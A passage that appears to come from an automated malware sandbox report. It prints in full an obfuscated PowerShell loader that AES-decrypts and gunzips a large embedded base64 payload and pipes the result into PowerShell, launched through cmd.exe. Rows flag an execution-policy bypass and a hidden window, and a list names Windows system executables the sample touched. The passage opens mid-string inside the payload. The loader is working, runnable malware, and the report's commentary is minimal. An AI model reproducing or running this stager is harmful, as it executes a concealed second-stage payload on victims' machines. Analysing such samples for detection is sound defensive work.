hzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - | ||||||
parent_process | powershell.exe | martian_process | C:\Windows\System32\cmd.exe /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |